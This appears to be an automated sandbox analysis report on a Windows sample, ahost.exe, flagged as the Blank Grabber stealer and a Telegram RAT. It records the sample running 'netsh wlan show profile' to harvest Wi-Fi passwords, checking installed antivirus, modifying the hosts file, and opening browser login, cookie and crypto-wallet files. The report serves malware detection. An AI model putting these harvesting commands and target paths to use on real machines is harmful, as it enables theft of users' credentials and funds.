Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\ahost.exe

Code function: 0_2_00007FF7F91ED080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7F91ED080

Source: C:\Users\user\Desktop\ahost.exe

Code function: 0_2_00007FF7F9205C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7F9205C70

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF8C48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

104_2_00007FF7CF8C48CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\ahost.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ahost.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: ahost.exe, 00000002.00000002.1871989503.000002162C890000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: exodus.wallet
Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: ahost.exe, 00000002.00000002.1871989503.000002162C890000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
